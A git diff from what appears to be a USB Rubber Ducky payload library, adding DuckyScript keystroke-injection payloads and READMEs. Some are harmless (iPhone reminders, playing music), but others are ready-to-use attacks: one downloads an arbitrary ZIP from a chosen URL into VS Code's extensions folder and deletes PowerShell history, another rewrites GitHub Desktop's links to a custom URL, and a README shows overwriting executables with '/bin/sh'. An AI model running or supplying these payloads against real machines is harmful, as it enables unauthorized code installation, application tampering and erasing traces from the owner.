$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 500
STRINGLN powershell
DELAY 500
STRINGLN Start-Process "https://github.com/settings/profile"; exit;
REM It depends by the computer power and by the internet connection power
DELAY 2000
REPEAT 37 TAB
STRING #NAME
REPEAT 4 TAB
STRING #BIO
TAB
REPEAT 4 DOWNARROW
STRING #CUSTOM-PRONOUNS
TAB
STRING #URL
TAB
STRING #SOCIAL-ACCOUNT-1
TAB
STRING #SOCIAL-ACCOUNT-2
TAB
STRING #SOCIAL-ACCOUNT-3
TAB
STRING #SOCIAL-ACCOUNT-4
TAB
STRING #COMPANY
TAB
STRING #LOCATION
REPEAT 4 TAB
ENTER
DELAY 2000
ALT-F4

24
payloads/library/execution/Change_Windows_User_Name/README.md
View File

@ -2,7 +2,7 @@
This script can be used to change the windows user name.
**Category**: Execute
**Category**: Execution
## Description
@ -19,3 +19,25 @@ It is absurd that you can do so many things on windows without asking for permis
```DuckyScript
DEFINE NEW_NAME example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

2
payloads/library/execution/Change_Windows_User_Name/payload.txt
View File

@ -3,7 +3,7 @@ REM # |
REM # Title : Change Windows User Name |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execute |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM #############################################

24
payloads/library/execution/Change_the_password_of_the_windows_user/README.md
View File

@ -2,7 +2,7 @@
Through this script you will be able to change windows user's password super fast.
**Category**: Execute
**Category**: Execution
## Description
@ -26,3 +26,25 @@ It is always very fascinating to see how many things you can do on Windows syste
- `STRINGLN Get-ExecutionPolicy -List`
![](docs/3.png)
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

2
payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt
View File

@ -3,7 +3,7 @@ REM # |
REM # Title : Change the password of the Windows user |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execute |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM ############################################################

26
payloads/library/execution/CloseAllApplicationsInWindows/README.md
View File

@ -19,10 +19,28 @@ Opens PowerShell hidden, download a Python script, execute it, remove Python scr
* Internet Connection
* Windows 10,11
### Executing program
* Plug in your device
### Settings
- No settings - Plug-And-Play
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

52
payloads/library/execution/Delete_A_Reminder_On_An_iPhone/README.md Normal file
View File

@ -0,0 +1,52 @@
# Delete A Reminder On An iPhone
This script can be used to delete a reminder really fast using an iPhone, so iOS system.
Open search bar, then open the Reminder app (I used the italian name so 'Promemoria'), then delete what is (hidden) stored and write the number, then call it.
**Category**: Execution
## Dependencies
* The phone must be unlocked
## Test
- iPhone 14
- iOS 16.4.1
## Settings
- You need to change the name of the application according to the language you have on your phone.
```DuckyScript
[21] DEFINE #REMINDER-APP-NAME example
```
- You should know the reminder name that you want to delete
```DuckyScript
[23] DEFINE #REMINDER-NAME example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

41
payloads/library/execution/Delete_A_Reminder_On_An_iPhone/payload.txt Normal file
View File

@ -0,0 +1,41 @@
REM_BLOCK
###################################################
# #
# Title : Delete A Reminder On An iPhone #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : iPhone #
# #
###################################################
END_REM
REM Requirements:
REM - The phone must be unlocked
REM Tested on:
REM - iPhone 14
REM - iOS 16.4.1
REM You need to change the name of the application according to the language you have on your phone.
DEFINE #REMINDER-APP-NAME example
REM You should know the reminder name that you want to delete
DEFINE #REMINDER-NAME example
DELAY 500
GUI SPACE
DELAY 300
STRINGLN #REMINDER-APP-NAME
DELAY 2000
GUI f
DELAY 1000
STRING #REMINDER-NAME
DELAY 500
TAB
DELAY 500
GUI a
BACKSPACE
DELAY 500
ENTER
DELAY 500
GUI h

58
payloads/library/execution/Edit_A_Reminder_On_An_iPhone/README.md Normal file
View File

@ -0,0 +1,58 @@
# Edit A Reminder On An iPhone
This script can be used to change a reminder name really fast using an iPhone, so iOS system.
Open search bar, then open the REMINDER app (I used the italian name so 'Promemoria'), then delete what is (hidden) stored and write the number, then call it.
**Category**: Execution
## Dependencies
* The phone must be unlocked
## Test
- iPhone 14
- iOS 16.4.1
## Settings
- You need to change the name of the application according to the language you have on your phone.
```DuckyScript
[21] DEFINE #REMINDER-APP-NAME
```
- You should know the old name of the reminder that you want to change
```DuckyScript
[23] DEFINE #OLD-REMINDER-NAME example
```
- Here you should set the new reminder name
```DuckyScript
[25] DEFIN #NEW-REMINDER-NAME example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

42
payloads/library/execution/Edit_A_Reminder_On_An_iPhone/payload.txt Normal file
View File

@ -0,0 +1,42 @@
REM_BLOCK
#################################################
# #
# Title : Edit A Reminder On An iPhone #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : iPhone #
# #
#################################################
END_REM
REM Requirements:
REM - The phone must be unlocked
REM Tested on:
REM - iPhone 14
REM - iOS 16.4.1
REM You need to change the name of the application according to the language you have on your phone.
DEFINE #REMINDER-APP-NAME example
REM You should know the old name of the reminder that you want to change
DEFINE #OLD-REMINDER-NAME example
REM Here you should set the new reminder name
DEFIN #NEW-REMINDER-NAME example
DELAY 500
GUI SPACE
DELAY 300
STRINGLN #REMINDER-APP-NAME
DELAY 2000
GUI f
DELAY 1000
STRING #OLD-REMINDER-NAME
DELAY 500
TAB
DELAY 500
GUI a
BACKSPACE
STRINGLN #NEW-REMINDER-NAME
DELAY 500
GUI h

22
payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/README.md
View File

@ -34,3 +34,25 @@ DEFINE PATH_TO_DESKTOP_FILE example/path
```DuckyScript
DEFINE ORIGINAL_DESKTOP_FILE_NAME example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

26
payloads/library/execution/ExploitingAnExecutableFile/README.md
View File

@ -18,10 +18,6 @@ A script used to detect all executable files in a Linux system. An executable fi
* Linux system
### Executing program
* Plug in your device
### Settings
* You can edit the content that you want to put into the executable file.
@ -30,3 +26,25 @@ A script used to detect all executable files in a Linux system. An executable fi
# You can put whatever you want into the executable file
echo "/bin/sh" > "$file"
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

50
payloads/library/execution/Follow_Someone_On_Instagram/README.md Normal file
View File

@ -0,0 +1,50 @@
# Follow someone on Instagram
This script can be used to prank friends by having them follow an Instagram account or it can be used by yourself to speed up this process.
Open a PowerShell, start a process trough the default browser that go to an instagram link like this one `https://www.instagram.com/alessandro_greco_aka_aleff/` closing the PowerShell. Then use some TABs to go to Follow button and then close the browser.
**Category**: Execution
## Note
Tested on:
- Windows 11 Eng
- Firefox Browser Eng
## Dependencies
* Internet Connection
* Instagram account logged in
## Settings
- You must set the Instagram account that you want to follow i.e. https://www.instagram.com/alessandro_greco_aka_aleff/
`[18] DEFINE #INSTAGRAM_LINK example`
- It depends by the computer power and by the internet connection power
`[72] DELAY 2000`
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

81
payloads/library/execution/Follow_Someone_On_Instagram/payload.txt Normal file
View File

@ -0,0 +1,81 @@
REM_BLOCK
################################################
# #
# Title : Follow someone on Instagram #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
################################################
END_REM
REM Requirements:
REM - Internet Connection
REM - Instagram account logged in
REM You must set the Instagram account that you want to follow i.e. https://www.instagram.com/alessandro_greco_aka_aleff/
DEFINE #INSTAGRAM_LINK example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 500
STRINGLN powershell
DELAY 2000
STRINGLN Start-Process "#INSTAGRAM_LINK"; exit;
REM It depends by the computer power and by the internet connection power
DELAY 2000
REM Go to Follow button and click it
REPEAT 12 TAB
DELAY 500
ENTER
DELAY 1000
REM Close the Browser
ALT F4

98
payloads/library/execution/Install_Any_Arbitrary_VSCode_Extension/README.md Normal file
View File

@ -0,0 +1,98 @@
# Install Any Arbitrary VSCode Extension
This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:
1. Removes any pre-existing version of the extension (if applicable).
2. Downloads a ZIP archive of a VSCode extension.
3. Extracts the extension to the correct VSCode extensions folder.
The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.
## First Of All!
Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
So...
- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
- Always check the source and source code before doing this
- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
## Features
- Detects Windows passively through [PASSIVE_WINDOWS_DETECT](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt) by Hak5.
- Installs a VSCode extension by downloading a ZIP file and extracting it to the correct location.
- Removes any previous version of the extension.
- Completely automated, requiring no manual intervention once the script is executed.
## Requirements
- **Target OS**: Windows 10/11
- **VSCode Path**: The script assumes that VSCode is installed in its default location. If it is installed in a different location, the paths in the script may need to be updated.
- **Compilation**: Make sure that the extension you are going to install has the out folder inside, that is, the folder that is generated as a result of compilation. Without this folder the extension cannot be loaded properly.
- **Internet Connection**: This is mandatory in case you want to download the archive from the Internet, whereas if you want to download from a server in the intranet you only need to be connected to the local network. This basically depends on the individual case....
## Usage
### DuckyScript Configuration
Before running the script, make sure to configure the following two variables in the script:
1. `#EXTENSION_NAME`: Replace this with the name of the folder where the extension will be installed.
```plaintext
DEFINE #EXTENSION_NAME example
```
Example: If the extension folder name is `DuckyScriptCookbook`, then replace `example` with `DuckyScriptCookbook`.
2. `#ARCHIVE_LINK`: Replace this with the actual URL to the ZIP file of the VSCode extension you want to install.
```plaintext
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
```
### PowerShell Commands Breakdown
- **Detecting and Removing Previous Extension**: The script checks if an official version of the extension is already installed and removes it:
```powershell
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
if (Test-Path -Path $extensionsPath -PathType Container) {
Remove-Item -Recurse -Force -Path $extensionsPath
}
```
- **Downloading and Extracting the New Extension**: The script downloads the extension from the link provided inside a temporary folder and extracts it inside the official (the default) VSCode extensions folder:
```powershell
$url = "#ARCHIVE_LINK"
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
Invoke-WebRequest -Uri $url -OutFile $downloadPath
if (Test-Path -Path $downloadPath) {
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
Remove-Item -Path $downloadPath -Force
}
```
## Notes
- Ensure that the ZIP file is structured properly (i.e., it contains all necessary files for the extension) before attempting to install.
- Make sure that PowerShell is available on the target machine.
- This script is intended for Windows 10/11 systems. Compatibility with other versions of Windows has not been tested.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

88
payloads/library/execution/Install_Any_Arbitrary_VSCode_Extension/payload.txt Normal file
View File

@ -0,0 +1,88 @@
REM_BLOCK
##########################################################
# #
# Title : Install Any Arbitrary VSCode Extension #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10 #
# #
##########################################################
END_REM
REM Replace "example" with the name of the extension folder
DEFINE #EXTENSION_NAME example
REM Replace "https://example.com/path/to/archive.zip" with your own ZIP Archive link
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN_POWERSHELL
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
if (Test-Path -Path $extensionsPath -PathType Container) {
Remove-Item -Recurse -Force -Path $extensionsPath
}
END_STRINGLN
REM May it depends by the extension...
DELAY 2000
STRINGLN_POWERSHELL
$url = "#ARCHIVE_LINK"
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
Invoke-WebRequest -Uri $url -OutFile $downloadPath
if (Test-Path -Path $downloadPath) {
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
Remove-Item -Path $downloadPath -Force
Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
}
END_STRINGLN

55
payloads/library/execution/Install_Official_VSCode_Extension/README.md Normal file
View File

@ -0,0 +1,55 @@
# Install Official VSCode Extension
This script automates the installation of an official Visual Studio Code extension on Windows 10/11 systems. The extension to be installed is specified via the `publisher.extensionName` parameter. The script uses passive operating system detection to determine if the system is running Windows, and proceeds with the extension installation accordingly.
## First Of All!
Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
So...
- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
- Always check the source and source code before doing this
- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
## Features
- **Passive Windows Detection:** The script includes an extension (`PASSIVE_WINDOWS_DETECT`) that passively detects if the operating system is Windows.
- **VSCode Extension Installation:** It uses the `code --install-extension` command to install the specified VSCode extension.
- **Windows 10/11 Compatibility:** Designed to work on Windows 10 and 11.
- **PowerShell History Cleanup:** After installation, the PowerShell history is cleared.
## Usage
### Required Parameter
- **#EXTENSION**: This parameter represents the ID of the VSCode extension you wish to install. The ID should follow the format `publisher.extensionName` (e.g., `Aleff.duckyscriptcookbook`).
## Requirements
- **Operating System**: Windows 10 or 11
- **PowerShell**
- **Visual Studio Code**
- **Internet**
- **Permissions to execute commands in PowerShell**
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

64
payloads/library/execution/Install_Official_VSCode_Extension/payload.txt Normal file
View File

@ -0,0 +1,64 @@
REM_BLOCK
#####################################################
# #
# Title : Install Official VSCode Extension #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
#####################################################
END_REM
REM replace 'publisher.extensionName' with the publisher id and extension id, for istance 'Aleff.duckyscriptcookbook'
DEFINE #EXTENSION publisher.extensionName
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN code --install-extension #EXTENSION; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit

24
payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/README.md
View File

@ -4,7 +4,7 @@ This script can be used to change some advanced Windows settings to make it as e
This script is Plug-And-Play <3
**Category**: Execute
**Category**: Execution
![](Make_Windows_performant_but_ugly_and_boring.gif)
@ -17,3 +17,25 @@ The script opens the Windows advanced settings via sysdm.cpl and accesses the ad
### Dependencies
* Nothing is needed, this script is Plug-And-Play <3
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

2
payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt
View File

@ -3,7 +3,7 @@ REM # |
REM # Title : Make Windows performant (but ugly and boring) |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execute |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ##################################################################

46
payloads/library/execution/Play_A_Song_On_An_iPhone/README.md Normal file
View File

@ -0,0 +1,46 @@
# Play A Song On An iPhone
This script can be used to play a song really fast using an iPhone, so iOS system.
Open search bar, then open the Music app (I used the italian name so 'Telefono'), then delete what is (hidden) stored and write the number, then call it.
**Category**: Execution
## Dependencies
* The phone must be unlocked
## Test
- iPhone 14
- iOS 16.4.1
## Settings
- You need to change the name of the application according to the language you have on your phone.
```DuckyScript
[20] DEFINE #MUSIC-APP-NAME example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

30
payloads/library/execution/Play_A_Song_On_An_iPhone/payload.txt Normal file
View File

@ -0,0 +1,30 @@
REM_BLOCK
##############################################
# #
# Title : Play A Song On An iPhone #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : iPhone #
# #
##############################################
END_REM
REM Requirements:
REM - The phone must be unlocked
REM Tested on:
REM - iPhone 14
REM - iOS 16.4.1
REM You need to change the name of the application according to the language you have on your phone.
DEFINE #MUSIC-APP-NAME example
DELAY 500
GUI SPACE
DELAY 300
STRINGLN #MUSIC-APP-NAME
DELAY 1000
SPACE
DELAY 500
GUI h

69
payloads/library/execution/Replace_Links_In_GithubDesktop/README.md Normal file
View File

@ -0,0 +1,69 @@
# Replace Links In GithubDesktop
This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user.
![](https://github.com/aleff-github/Deposito/blob/main/Replace_Links_In_GithubDesktop/GithubDesktop.gif?raw=true)
## Table of Contents
- [Features](#features)
- [Prerequisites](#prerequisites)
- [Usage](#usage)
- [Credits](#credits)
## Features
This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. It does the following:
1. Detects the installation folder of GitHub Desktop.
2. Identifies the latest installed version of GitHub Desktop. It may happen that there are multiple versions on the computer but it is always the most recent one that is used, I would suggest to Github Desktop developers to remove old versions that unnecessarily burden a computer.
3. Replaces any occurrences of GitHub URLs in the `renderer.js` and `main.js` files with a new link defined by the user.
The script uses **PowerShell** to perform this replacement after detecting the operating system and target files.
## Prerequisites
- **Windows 10/11**
- **GitHub Desktop** installed on the machine.
## Usage
1. **Modify the script**:
- Define the new URL to replace the original GitHub link by modifying the `#NEW_LINK` variable in the script:
```duckyscript
DEFINE #NEW_LINK example.com
```
2. **Customization**:
- Ensure that the path to GitHub Desktop is correct. If GitHub Desktop is installed in a non-default location, modify the `#SUBDIRECTORY` variable accordingly:
```ducky
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
```
3. **Execution**:
- Upon execution, the script will:
- Open PowerShell.
- Detect the GitHub Desktop installation directory.
- Replace all GitHub URLs in the `renderer.js` and `main.js` files with the new URL you specified.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

109
payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt Normal file
View File

@ -0,0 +1,109 @@
REM_BLOCK
#####################################################
# #
# Title : Replace Links In GithubDesktop #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
#####################################################
END_REM
REM REQUIRED - Define here the new url that will replace the original github link
DEFINE #NEW_LINK example.com
REM DON'T CHANGE - This variable is a constant in this case, change it only if you are sure that the path to GithubDesktop is not the default
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
REM_BLOCK
Credits: Hak5 LLC
Website: https://hak5.org/
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
